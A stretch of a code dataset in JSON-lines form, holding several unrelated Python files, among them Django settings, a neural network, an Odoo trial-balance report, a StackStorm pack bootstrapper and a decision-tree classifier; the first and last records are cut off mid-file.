\"/Applications/XAMPP/xamppfiles/htdocs/Music_d\";\n\n for subdir, dirs, files in os.walk(rootDir):\n for file in files:\n path = str(os.path.join(subdir, file))\n\n ext = [\".php\", \".html\", \".css\", \".js\", \".scss\"]\n\n for i in ext:\n if i in path:\n file = open(path, \"r\")\n data = file.readlines()\n\n for j in data:\n counter += 1\n print(\"Counter\", counter)\n\nmain()","sub_path":"tools/lineCounter.py","file_name":"lineCounter.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"432945015","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport random\n\nnoun = (\"總經理 zǒngjīnglǐ bank manager\",\"銀行 yínháng bank\",\"她 tā she\")\nverb = (\"jumps\", \"walks\", \"crawls\")\npreposition = (\"under\",\"over\")\n\nprint (\"\\n\" + random.choice(noun) + \"\\n\" + random.choice(verb)+ \"\\n\")\n","sub_path":"languages/python/mandarin/random.words.py","file_name":"random.words.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"644130990","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for production environment.\n\n- Load secret values from environment variables.\n\"\"\"\n\nfrom .base import * # noqa: F403\n\n# SECRET CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Raises ImproperlyConfigured exception if DJANGO_SECRET_KEY not in os.environ\nSECRET_KEY = env(\"DJANGO_SECRET_KEY\") # noqa: F405\n\n# DATABASE CONFIGURATION\n# ----------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n \"default\": env.db(\"DATABASE_URL\"), # noqa: F405\n}\nDATABASES[\"default\"][\"ATOMIC_REQUESTS\"] = True\n\n# Allow all host headers\nALLOWED_HOSTS = [\"*\"]\n\n# This ensures that Django will be able to detect a secure connection\n# properly on Heroku.\nSECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTO\", \"https\")\n\n# SECURITY CONFIGURATION\n# ------------------------------------------------------------------------------\n# See https://docs.djangoproject.com/en/dev/ref/middleware/#module-django.middleware.security\n# and https://docs.djangoproject.com/en/dev/howto/deployment/checklist/#run-manage-py-check-deploy\n\n# set this to 60 seconds and then to 518400 when you can prove it works\nSECURE_HSTS_SECONDS = 60\nSECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(\"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS\", default=True) # noqa: F405\nSECURE_CONTENT_TYPE_NOSNIFF = env.bool(\"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF\", default=True) # noqa: F405\nSECURE_BROWSER_XSS_FILTER = True\nSESSION_COOKIE_SECURE = True\nSESSION_COOKIE_HTTPONLY = True\nSECURE_SSL_REDIRECT = env.bool(\"DJANGO_SECURE_SSL_REDIRECT\", default=True) # noqa: F405\nCSRF_COOKIE_SECURE = True\nCSRF_COOKIE_HTTPONLY = True\nX_FRAME_OPTIONS = \"DENY\"\nINSTALLED_APPS += [\"gunicorn\", ] # noqa: F405\n\n# Static Assets\n# ------------------------\nSTATICFILES_STORAGE = \"whitenoise.storage.CompressedManifestStaticFilesStorage\"\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"handlers\": {\n \"console\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n },\n },\n \"loggers\": {\n \"django\": {\n \"handlers\": [\"console\"],\n }\n }\n}\n\n# Use Google Cloud Platform for storage\nDEFAULT_FILE_STORAGE = \"config.storage.GoogleCloudStorage\"\n","sub_path":"cs4teachers/config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"37601681","text":"from activation_functions import sigmoid, sigmoidp\nfrom cost_functions import mse\nfrom data import INPUT_INDEX, OUTPUT_INDEX\nfrom fileio import read_json, write_json\nfrom neuron import Neuron\nfrom tqdm import tqdm\n\nclass Network:\n def __init__(self, structure, lossfn, actfn, actfnp) -> None:\n network = []\n L = len(structure) - 1\n for l in range(len(structure)):\n this_layer_num_neurons = structure[l]\n layer = [Neuron() for _ in range(this_layer_num_neurons)]\n for neuron in layer: neuron.layer = l\n\n network.append(layer)\n\n for l in range(len(network) - 1):\n this_layer = network[l]\n next_layer = network[l + 1]\n for this_neuron in this_layer:\n for next_neuron in next_layer:\n this_neuron.connect(next_neuron)\n\n self.network = network\n self.lossfn = lossfn\n self.actfn = actfn\n self.actfnp = actfnp\n\n def __repr__(self) -> str:\n return str(self) + \"\\n\"\n\n def __str__(self) -> str:\n result = \"\"\n for layer in self.network:\n result += \"\\n\" + str(layer) + \"\\n\"\n return result\n\n def get_total_error(self, dataset):\n error = 0.0\n for data in dataset:\n input = data[INPUT_INDEX]\n expected = data[OUTPUT_INDEX]\n actual = self.forward_propagate(input)\n for i in range(len(actual)):\n error += abs(self.lossfn(a=actual[i], e=expected[i]))\n error /= (1.0 * len(dataset))\n return error\n\n def serialize(self) -> str:\n return [[x.serialize() for x in layer] for layer in self.network]\n\n def deserialize(self, serialized_network):\n if serialized_network is None:\n raise Exception(\"No serialized data avaialble\")\n \n deserialized = serialized_network\n \n for l in range(len(deserialized)):\n layer = deserialized[l]\n for n in range(len(layer)):\n neuron = layer[n]\n self.network[l][n].deserialize(neuron)\n\n return self\n\n def train(self, dataset, max_epochs, learn_rate, precision):\n for epoch in tqdm(range(max_epochs)):\n for i in range(len(dataset)):\n inputs = dataset[i][INPUT_INDEX]\n expected = dataset[i][OUTPUT_INDEX]\n self.forward_propagate(inputs)\n self.backpropagate(expected, learn_rate)\n\n total_error = self.get_total_error(dataset)\n\n if (epoch % (max_epochs // 10)) == 0:\n learn_rate /= 1.05\n\n if abs(total_error) <= abs(precision):\n return\n\n return\n\n def run(self, dataset):\n results = []\n for i in range(len(dataset)):\n if type(dataset[i]) == list:\n inputs = dataset[i][0]\n elif type(dataset[i]) == dict:\n inputs = dataset[i][\"input\"]\n results.append(self.forward_propagate(inputs))\n return results\n\n def build_file_name(self, prefix, filetype=\".json\"):\n structure = \"x\".join([str(len(l)) for l in self.network])\n return prefix + \"-\" + structure + filetype\n\n def write_to_file(self, prefix):\n return write_json(self.serialize(), file=self.build_file_name(prefix=prefix))\n\n def load_from_file(self, prefix):\n network_file = self.build_file_name(prefix)\n serialized_network = read_json(network_file)\n if serialized_network is not None:\n self.deserialize(serialized_network)\n else:\n print(network_file + \" not found, creating file...\")\n return\n\n def forward_propagate(self, inputs):\n if len(inputs) != len(self.network[0]):\n raise Exception(\"Input length does not match input layer\")\n \n # set all neuron outputs to 0.0\n for layer in self.network:\n for neuron in layer:\n neuron.actsum = 0.0\n neuron.output = 0.0\n\n # set input layer neuron outputs to the inputs\n for i in range(len(inputs)):\n self.network[0][i].output = inputs[i]\n\n # loop through all but the output layer propagating input\n for l in range(len(self.network) - 1):\n layer = self.network[l]\n next_layer = self.network[l + 1]\n \n # if it's not the last hidden layer multiply weight by output\n for neuron in layer:\n for weight in neuron.weights:\n weight.output_neuron.actsum += weight.value * neuron.output\n\n # apply activation function to all neuron outputs\n for neuron in next_layer:\n neuron.actsum += neuron.bias\n neuron.output = self.actfn(neuron.actsum)\n\n return [x.output for x in self.network[-1]]\n\n # network, expected output, loss function, derivative of activation function\n def backpropagate(self, expected, learn_rate):\n output_layer = self.network[-1]\n\n for i in range(len(output_layer)):\n neuron = output_layer[i]\n gradient = self.lossfn(a=neuron.output, e=expected[i]) * self.actfnp(neuron.actsum)\n neuron.gradient = gradient\n self.backpropagate_hidden(neuron, learn_rate)\n\n # L is the same layer that source neuron is in\n def backpropagate_hidden(self, source, learn_rate):\n if source is None or source.layer < 1:\n return\n \n layer = self.network[source.layer - 1]\n for neuron in layer:\n new_gradient = 0.0\n for weight in neuron.weights:\n if weight.output_neuron == source:\n gradient_wrt_w = weight.value * source.gradient * self.actfnp(neuron.actsum)\n new_gradient += gradient_wrt_w\n weight_delta = learn_rate * source.gradient * neuron.output\n weight.value += weight_delta\n bias_delta = -learn_rate * source.gradient\n neuron.bias += bias_delta\n neuron.gradient = new_gradient\n self.backpropagate_hidden(neuron, learn_rate)\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"321487711","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 10 11:41:42 2019\n\n@author: thevexis\n\nProject\nPartial Differential Equations \n\"\"\"\n\n\nimport matplotlib.pylab as p;\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom numpy import *;\nimport numpy;\n\nprint(\"Initializing\")\nNmax = 50; Niter = 70; V=zeros((Nmax,Nmax),float)\n\nfor k in range(0,Nmax-1): V[0,k]=100\nfor iter in range(Niter):\n if iter%10 == 0: print(iter)\n for i in range(1,Nmax-2):\n for j in range(1,Nmax-2):\n V[i,j]=0.25*(V[i+1,j]+V[i-1,j]+V[i,j+1]+V[i,j-1])\nx = range(0,Nmax-1,2); y=range(0,50,2)\nX, Y = p.meshgrid(x,y)\n\ndef functz(V):\n z = V[X,Y]\n return z\n\nZ = functz(V)\nfig = p.figure()\nax = Axes3D(fig)\nax.plot_wireframe(X,Y,Z, color='r')\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Potential')\np.show()\n\n\n\n","sub_path":"Project/Example.py","file_name":"Example.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"465382598","text":"# Создание нового словаря\n# new_dict = dict() # {}\n\n#country_1 = {'name': 'Thailand, 'sea': True}\n#country_2 = {'name': 'Hungary', 'sea': False}\n\n# Подход 1 - списки\n#countries = [\n\t#{'name': 'Thailand', 'sea': True, 'schengen': False, 'average_temperature': 30, 'currency_rate': 1.8},\n\t#{'name': 'Hungary', 'sea': False, 'schengen': True, 'average_temperature': 10, 'currency_rate': 0.3},\n\t#{'name': 'Germany', 'sea': True, 'schengen': True, 'average_temperature': 5, 'currency_rate': 80},\n\t#{'name': 'Japan', 'sea': True, 'schengen': False, 'average_temperature': 15, 'currency_rate': 0.61}\n\t#]\n\t\n\t\n# Подход 2 - словарь\ncountries = {\n\t#'Cuba': data_about_Cuba,\n\t'Thailand': {'sea': True, \n\t\t\t\t'schengen': False, \n\t\t\t\t'average_temperature': 30, \n\t\t\t\t'currency_rate': 1.8},\n\t'Hungary': {'sea': False, \n\t\t\t\t'schengen': True, \n\t\t\t\t'average_temperature': 10, \n\t\t\t\t'currency_rate': 0.3},\n\t'Germany': {'sea': True, \n\t\t\t\t'schengen': True, \n\t\t\t\t'average_temperature': 5, \n\t\t\t\t'currency_rate': 80},\n\t'Japan': {'sea': True, \n\t\t\t\t'schengen': False, \n\t\t\t\t'average_temperature': 15, \n\t\t\t\t'currency_rate': 0.61},\n\t}\n# Как заполнить словарь\n# d = dict()\n# d['name'] = 'Thailand'\n\t\n# Множества - удобная структура для операций пересечения и объединения, поддерживает уникальность элементов\t\n# В отличие от списков, элементы множества не упорядочены\nschengen_countries = set()\nsea_countries = set()\n\t\nfor country_name, properties in countries.items():\n\tif properties['schengen']:\n\t\tschengen_countries.add(country_name)\n\tif properties['sea']:\n\t\tsea_countries.add(country_name)\n\t\t\n\t\t\nprint (sea_countries)\nprint (schengen_countries)\n#print ('Страны в шенгене и с морем: ', schengen_countries & sea_countries)\n\n\n# Форматирование вывода\n#money_amount = 10000\n#for country in countries:\n#\tcurrency_amount = money_amount / country['currency_rate']\n#\tprint('У нас будет %.3f денег в местной валюте' % currency_amount)\n\n\nsea_schengen_countries = schengen_countries & sea_countries\n\n# Подход со списками словарей\n#for country_name in sea_schengen_countries:\n#\tfor country in countries:\n#\t\tif country['name'] == country_name:\n#\t\t\tprint(country)\n#\t\t\tbreak\n\n# Подход со словарем словарей\nfor country_name in sea_schengen_countries:\n\tprint(\"Страны с морем\", country_name, countries[country_name])\n\n\n","sub_path":"home work dict.py","file_name":"home work dict.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"384206409","text":"import os\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\nfrom odoo.modules import get_module_path\nfrom datetime import datetime\nimport json\n\n\nclass WizardTrialBalance(models.TransientModel):\n _inherit = 'wizard.kg.report.general.ledger'\n _name = 'wizard.kg.report.trial.balance'\n _title = \"KG Report - Trial Balance\"\n\n # sortby = fields.Selection([('sort_date', 'Date'), ('sort_journal_partner', 'Journal & Partner')], string='Sort by',\n # required=True, default='sort_date')\n # journal_ids = fields.Many2many('account.journal', string='Journals', required=True,\n # # default=lambda self: self.env['account.journal'].search([])\n # )\n # display_account = fields.Selection([('all', 'All'), ('movement', 'With movements'),\n # ('not_zero', 'With balance is not equal to 0'), ],\n # string='Display Accounts', required=True, default='movement')\n # date_from = fields.Date(string='Start Date')\n # date_to = fields.Date(string='End Date')\n # target_move = fields.Selection([('posted', 'All Posted Entries'),\n # ('all', 'All Entries'),\n # ], string='Target Moves', required=True, default='posted')\n # report_type = fields.Selection([('sum', 'Summary'), ('det', 'Details'), ], 'Report Type',\n # required=True, default='det')\n\n @api.multi\n def _get_data(self):\n\n self.report_has_logo = True # sample report has logo\n current_company = self.get_param()\n\n res = self.get_report_values(current_company)\n\n return {\n \"data1\": res\n }\n\n def get_report_values(self, current_company=None):\n\n cr = self.env.cr\n\n sql_sort, where_date, where_state, where_display, \\\n init_date, init_balance = self.query_get_clause()\n\n query = \"\"\"\n WITH z_kg_trial_balance_beg_balance AS (\n SELECT l.account_id AS account_id, COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) AS beg_balance\n FROM account_move_line l\n LEFT JOIN account_move m ON (l.move_id=m.id) \n WHERE l.date < %s \n and l.company_id = %s \n \"\"\" + where_state + \"\"\" \n GROUP BY l.account_id\n ),\n z_kg_move_line as (\n SELECT l.account_id , \n COALESCE(SUM(l.debit),0) AS debit, \n COALESCE(SUM(l.credit),0) AS credit, \n COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) AS balance\n FROM account_move_line l \n LEFT JOIN account_move m ON (l.move_id=m.id) \n LEFT JOIN account_journal j ON (l.journal_id=j.id) \n where l.company_id = %s \n \"\"\" + where_date + \"\"\"\n \"\"\" + where_state + \"\"\" \n GROUP by l.account_id\n )\n SELECT acc.\"name\" as acc_name, \n acc.code as acc_code, \n COALESCE(z.beg_balance,0) AS beg_balance, \n COALESCE(l.debit,0) AS debit, \n COALESCE(l.credit,0) AS credit, \n COALESCE(l.debit,0) - COALESCE((l.credit), 0) AS balance\n FROM account_account acc\n LEFT JOIN z_kg_trial_balance_beg_balance z on (acc.id = z.account_id)\n LEFT JOIN z_kg_move_line l ON (l.account_id = acc.id) \n WHERE acc.company_id = %s \n \"\"\" + where_display + \"\"\" \n ORDER BY acc.code \n\n \"\"\"\n params = (init_date, current_company.id, current_company.id, current_company.id)\n self._cr.execute(query, params)\n data = cr.dictfetchall()\n\n return data\n\n def query_get_clause(self):\n\n sql_sort = \"acc.code\"\n # if self.sortby == 'sort_date' and self.report_type == 'det':\n # sql_sort = \"acc.code\"\n # elif self.sortby == 'sort_journal_partner' and self.report_type == 'sum':\n # sql_sort = \"acc.code\"\n # elif self.sortby == 'sort_journal_partner':\n # sql_sort = \"acc.code\"\n\n where_date = \"\"\n init_balance = False # self.initial_balance\n # if init_balance and not start_date:\n # raise UserError(_(\"You must define a Start Date\"))\n\n if self.date_from:\n where_date += \"AND l.date >= '\" + self.date_from + \"' \"\n init_date = self.date_from\n else:\n init_date = '1900-01-01'\n\n if self.date_to:\n where_date += \"AND l.date <= '\" + self.date_to + \"' \"\n\n where_state = \"AND m.state = 'posted' \"\n if self.target_move == 'all':\n where_state = \"\"\n\n where_display = \"and (COALESCE(l.debit,0) > 0 or COALESCE(l.credit, 0) > 0 or COALESCE(z.beg_balance,0) != 0)\"\n # having_display = \"\"\n # if self.display_account == 'not_zero':\n # having_display = \"\"\n # elif self.display_account == 'all':\n # where_display = \"\"\n # having_display = \"\"\n\n return sql_sort, where_date, where_state, \\\n where_display, init_date, init_balance\n\n def get_param(self):\n current_user = self.env['res.users'].browse(self.env.context.get('uid', False))\n current_company = current_user.company_id\n\n return current_company\n\n def _define_report_name(self):\n # if self.report_type == \"det\":\n # rpt = \"/kg_account/static/rpt/TrialBalanceSummary.mrt\"\n # else:\n rpt = \"/kg_account/static/rpt/TrialBalanceSummary.mrt\"\n\n return rpt\n\n def _define_report_variables(self):\n variables = list()\n\n current_company = self.get_param()\n\n variables.append(KgReportVariable(\n key=\"StartDate\", # variable name in report\n value=self.date_from if self.date_from else '',\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"EndDate\", # variable name in report\n value=self.date_to if self.date_to else '',\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"Display\", # variable name in report\n value=dict(self._fields['display_account'].selection).get(self.display_account),\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"Sort\", # variable name in report\n value=dict(self._fields['sortby'].selection).get(self.sortby),\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"Target\", # variable name in report\n value=dict(self._fields['target_move'].selection).get(self.target_move),\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"UserPrint\", # variable name in report\n value=self.env.user.name,\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"Company\", # variable name in report\n value=current_company.name,\n ).to_dict())\n\n return variables\n\n\nclass KgReportVariable(object):\n\n def __init__(self, key, value, is_image=False, format_value=\"url\"):\n self.key = key\n self.value = value\n self.is_image = is_image\n self.format_value = format_value # this is format value for image (str or url path)\n\n def to_dict(self):\n return {\n \"key\": self.key,\n \"value\": self.value,\n \"is_image\": self.is_image,\n \"format_value\": self.format_value\n }\n","sub_path":"local/kg_account/wizards/wizard_kg_report_trial_balance.py","file_name":"wizard_kg_report_trial_balance.py","file_ext":"py","file_size_in_byte":8037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"616424901","text":"#\n# @lc app=leetcode.cn id=1178 lang=python3\n#\n# [1178] 猜字谜\n#\nfrom functools import lru_cache\nfrom test.test_threading import Counter\nfrom typing import List\n\n\n# @lc code=start\nclass Solution:\n A = ord('a')\n\n @classmethod\n @lru_cache\n def _c_mask(cls, c: str):\n \"\"\"\n 返回指定字符的二进制标识位\n 例如 'a' 为 '1','b' 为 '10', 'c' 为 '100' 等\n \"\"\"\n return 1 << (ord(c) - cls.A)\n\n def findNumOfValidWords(self, words: List[str], puzzles: List[str]) -> List[int]:\n \"\"\"\n Args:\n words(List[str]): 输入的词列表\n puzzles(List[str]): 字谜的谜面列表\n\n Returns:\n List[int]: 转置后的矩阵\n \"\"\"\n\n freq = Counter()\n \n for w in words:\n mask = 0\n\n # 计算一个单词的二进制掩码\n for c in w:\n mask |= self._c_mask(c)\n\n if str(bin(mask)).count('1') <= 7:\n freq[mask] += 1\n\n res = []\n for puzzle in puzzles:\n total = 0\n\n mask = 0\n for i in range(1, 7):\n mask |= self._c_mask(puzzle[i])\n\n subset = mask\n while subset:\n s = subset | self._c_mask(puzzle[0])\n if s in freq:\n total += freq[s]\n\n subset = (subset - 1) & mask\n\n # 在枚举子集的过程中,要么会漏掉全集 mask,要么会漏掉空集\n # 这里会漏掉空集,因此需要额外判断空集\n if self._c_mask(puzzle[0]) in freq:\n total += freq[self._c_mask(puzzle[0])]\n\n res.append(total)\n\n return res\n# @lc code=end\n\n","sub_path":"1178.猜字谜.py","file_name":"1178.猜字谜.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"534227584","text":"# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nimport shutil\nimport argparse\nimport logging\nimport logging.config\n\nimport six\nimport cmd2\nfrom cmd2 import Cmd\nfrom jinja2 import Environment, FileSystemLoader\n\n__all__ = [\n 'SDKApp'\n]\n\nLOG = logging.getLogger(__name__)\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nTEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')\nLICENSE_PATH = os.path.abspath(os.path.join(TEMPLATES_DIR, 'LICENSE'))\n\nCOMMAND_HELP = {\n 'bootstrap': [\n 'bootstrap [pack name]',\n 'Create initial directory structure for the provided pack.'\n ]\n}\n\nDIRECTORY_STRUCTURE = [\n 'sensors/',\n 'actions/',\n]\n\nFILE_TEMPLATES = [\n {\n 'name': 'README.md',\n 'path': 'README.md'\n },\n {\n 'name': 'pack.yaml',\n 'path': 'pack.yaml'\n },\n {\n 'name': 'config.yaml',\n 'path': 'config.yaml'\n }\n]\n\n\nbootstrap_parser = argparse.ArgumentParser()\nbootstrap_parser.add_argument('pack_name', help='Pack name')\nbootstrap_parser.add_argument('-i', '--interactive',\n action='store_true',\n default=False,\n help='Run in an interactive mode')\nbootstrap_parser.add_argument('-l', '--add-license',\n action='store_true',\n default=False,\n help='Copy Apache 2.0 LICENSE file to the pack directory')\n\n\nclass SDKApp(Cmd):\n into = 'Welcome to st2sdk'\n prompt = '(st2sdk): '\n\n @cmd2.with_argparser(bootstrap_parser)\n def do_bootstrap(self, args):\n pack_name = args.pack_name\n add_license = args.add_license\n self._setup_logging()\n\n if args.interactive:\n data = self._gather_input(pack_name=pack_name)\n else:\n data = {\n 'pack_name': pack_name,\n 'author_name': 'John Doe',\n 'author_email': 'john.doe@example.com'\n }\n\n if not data['pack_name']:\n raise ValueError('Pack name is required')\n\n self._handle_bootstrap(data=data, add_license=add_license)\n\n def help_bootstrap(self):\n help_string = COMMAND_HELP['bootstrap']\n help_string = '\\n'.join(help_string)\n print(help_string)\n\n def _gather_input(self, pack_name=None):\n \"\"\"\n :rtype: ``dict``\n \"\"\"\n if not pack_name:\n pack_name = six.moves.input('Pack name: ')\n\n author_name = six.moves.input('Author name: ')\n author_email = six.moves.input('Author email: ')\n\n data = {\n 'pack_name': pack_name,\n 'author_name': author_name,\n 'author_email': author_email\n }\n return data\n\n def _get_template_context(self):\n \"\"\"\n :rtype: ``dict``\n \"\"\"\n context = {}\n return context\n\n def _handle_bootstrap(self, data, add_license=False):\n cwd = os.getcwd()\n pack_name = data['pack_name']\n pack_path = os.path.join(cwd, pack_name)\n\n if os.path.isdir(pack_path):\n raise ValueError('Pack directory \"%s\" already exists' %\n (pack_path))\n\n # 1. Create directory structure\n pack_path = self._create_directory_structure(pack_path=pack_path)\n\n # 2. Copy over and render the file templates\n context = data\n self._render_and_write_templates(pack_path=pack_path, context=context)\n\n # 3. Copy over license file (if specified)\n if add_license:\n shutil.copyfile(LICENSE_PATH, os.path.join(pack_path, 'LICENSE'))\n\n LOG.info('Pack \"%s\" created in %s' % (pack_name, pack_path))\n\n def _create_directory_structure(self, pack_path):\n LOG.debug('Creating directory: %s' % (pack_path))\n os.makedirs(pack_path)\n\n for directory in DIRECTORY_STRUCTURE:\n full_path = os.path.join(pack_path, directory)\n LOG.debug('Creating directory: %s' % (full_path))\n os.makedirs(full_path)\n\n return pack_path\n\n def _render_and_write_templates(self, pack_path, context):\n \"\"\"\n :param context: Template render context.\n :type context: ``dict``\n \"\"\"\n env = Environment(loader=FileSystemLoader(TEMPLATES_DIR))\n\n for template_dict in FILE_TEMPLATES:\n template_name = template_dict['name']\n render_path = template_dict['path']\n\n template = env.get_template(template_name)\n rendered = template.render(**context)\n\n full_render_path = os.path.join(pack_path, render_path)\n with open(full_render_path, 'w') as fp:\n LOG.debug('Writing template file: %s' % (full_render_path))\n fp.write(rendered)\n\n def _setup_logging(self):\n logging_config = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '%(asctime)s %(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n '()': logging.StreamHandler,\n 'formatter': 'default'\n }\n },\n 'root': {\n 'handlers': ['console'],\n 'level': 'INFO',\n },\n }\n logging.config.dictConfig(logging_config)\n","sub_path":"st2sdk/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"170176858","text":"from image_features.colormoments import ColorMoment\nfrom image_features.HOG import HOG\nfrom image_features.SIFT import SIFT\nfrom image_features.FeatureModel import *\nfrom utils.cli_options import *\nfrom utils.distance_measures import *\nfrom utils.similarity_measures import *\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.decomposition import TruncatedSVD\nimport matplotlib.pyplot as plt\nimport cv2 as cv\nfrom math import ceil\nimport os\nimport pagerank as pagerank\nimport scipy.sparse as sparse\nimport pandas as pd\nimport csv\nfrom image_features.LBP import LBP\nimport cvxopt\nimport cvxopt.solvers\nfrom cvxopt import matrix as cvxopt_matrix\nfrom cvxopt import solvers as cvxopt_solvers\nimport task5 as lsh\n\nCURRENT_DIR = os.path.dirname(__file__)\nOUTPUT_DIR = os.path.join(CURRENT_DIR, '..' + os.sep, 'Outputs', 'Task_4')\n\n\nclass ImageSimilarity:\n def __init__(self, image_id, similarity):\n self.image_id = image_id\n self.similarity = similarity\n\n\nclass Node:\n def __init__(self, gini, num_samples, num_samples_per_class, predicted_class):\n self.gini = gini\n self.num_samples = num_samples\n self.num_samples_per_class = num_samples_per_class\n self.predicted_class = predicted_class\n self.feature_index = 0\n self.threshold = 0\n self.left = None\n self.right = None\n\n\nclass DecisionTreeClassifier:\n def __init__(self, max_depth = None):\n self.max_depth = max_depth\n\n def _best_split(self, X, y):\n # Need at least two elements to split a node.\n m = y.size\n if m <= 1:\n return None, None\n\n # Count of each class in the current node.\n num_parent = [np.sum(y == c) for c in range(self.n_classes_)]\n\n # Gini of current node.\n best_gini = 1.0 - sum((n / m) ** 2 for n in num_parent)\n best_idx, best_thr = None, None\n\n # Loop through all features.\n for idx in range(self.n_features_):\n # Sort data along selected feature.\n thresholds, classes = zip(*sorted(zip(X[:, idx], y)))\n\n # We could actually split the node according to each feature/threshold pair\n # and count the resulting population for each class in the children, but\n # instead we compute them in an iterative fashion, making this for loop\n # linear rather than quadratic.\n num_left = [0] * self.n_classes_\n num_right = num_parent.copy()\n for i in range(1, m): # possible split positions\n c = classes[i - 1]\n num_left[c] += 1\n num_right[c] -= 1\n gini_left = 1.0 - sum(\n (num_left[x] / i) ** 2 for x in range(self.n_classes_)\n )\n gini_right = 1.0 - sum(\n (num_right[x] / (m - i)) ** 2 for x in range(self.n_classes_)\n )\n\n # The Gini impurity of a split is the weighted average of the Gini\n # impurity of the children.\n gini = (i * gini_left + (m - i) * gini_right) / m\n\n # The following condition is to make sure we don't try to split two\n # points with identical values for that feature, as it is impossible\n # (both have to end up on the same side of a split).\n if thresholds[i] == thresholds[i - 1]:\n continue\n\n if gini < best_gini:\n best_gini = gini\n best_idx = idx\n best_thr = (thresholds[i] + thresholds[i - 1]) / 2 # midpoint\n\n return best_idx, best_thr\n\n def fit(self, X, y):\n \"\"\"Build decision tree classifier.\"\"\"\n self.n_classes_ = len(set(y)) # classes are assumed to go from 0 to n-1\n self.n_features_ = X.shape[1]\n self.tree_ = self._grow_tree(X, y)\n\n def _grow_tree(self, X, y, depth = 0):\n \"\"\"Build a decision tree by recursively finding the best split.\"\"\"\n # Population for each class in current node. The predicted class is the one with\n # largest population.\n num_samples_per_class = [np.sum(y == i) for i in range(self.n_classes_)]\n predicted_class = np.argmax(num_samples_per_class)\n node = Node(\n gini = self._gini(y),\n num_samples = y.size,\n num_samples_per_class = num_samples_per_class,\n predicted_class = predicted_class,\n )\n\n # Split recursively until maximum depth is reached.\n if depth < self.max_depth:\n idx, thr = self._best_split(X, y)\n if idx is not None:\n indices_left = X[:, idx] < thr\n X_left, y_left = X[indices_left], y[indices_left]\n X_right, y_right = X[~indices_left], y[~indices_left]\n node.feature_index = idx\n node.threshold = thr\n node.left = self._grow_tree(X_left, y_left, depth + 1)\n node.right = self._grow_tree(X_right, y_right, depth + 1)\n return node\n\n def predict(self, X):\n return [self._predict(inputs) for inputs in X]\n\n def _predict(self, inputs):\n \"\"\"Predict class for a single sample.\"\"\"\n node = self.tree_\n while node.left:\n if inputs[node.feature_index] < node.threshold:\n node = node.left\n else:\n node = node.right\n return node.predicted_class\n\n def _gini(self, y):\n m = y.size\n return 1.0 - sum((np.sum(y == c) / m) ** 2 for c in range(self.n_classes_))\n\n\ndef dimension_reduction(X, k, selected_model, dim_reduction_tech, input_images):\n model = get_feature_model(selected_model)\n dim_reduction_model = get_dim_reduction_tech(dim_reduction_tech)\n\n # HOG (ideal = 73%, edges = 12, dim = 50, data set 2->2)\n # top_dim = 50\n # CM (ideal = 72%, edges = 12, dim = 20, data set 2->2)\n # data set 2 -> 1 = 80%\n # data set 1 -> 2 = 48%\n top_dim = 20\n\n # PCA\n if dim_reduction_tech == \"1\":\n 